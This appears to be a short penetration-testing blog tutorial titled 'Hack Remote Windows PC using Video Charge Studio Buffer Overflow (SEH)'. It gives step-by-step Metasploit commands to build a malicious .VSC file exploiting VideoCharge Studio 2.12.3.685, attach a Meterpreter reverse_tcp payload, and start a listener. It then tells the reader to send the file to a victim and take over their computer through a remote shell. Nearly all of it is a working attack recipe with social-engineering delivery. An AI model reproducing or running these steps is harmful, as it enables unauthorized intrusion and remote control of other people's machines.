Categories

Archives

Kali Linux, Penetration Testing

Hack Remote Windows PC using Video Charge Studio Buffer Overflow (SEH)

This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when processing a specially crafted .VSC file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.

Exploit Targets

VideoCharge Studio 2.12.3.685

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/videocharge_studio

msf exploit (videocharge_studio)>set payload windows/meterpreter/reverse_tcp

msf exploit (videocharge_studio)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (videocharge_studio)>exploit

After we successfully generate the malicious vsc File, it will stored on your local computer

/root/.msf4/local/msf.vsc

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.7

exploit

Now send your msf.vsc files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer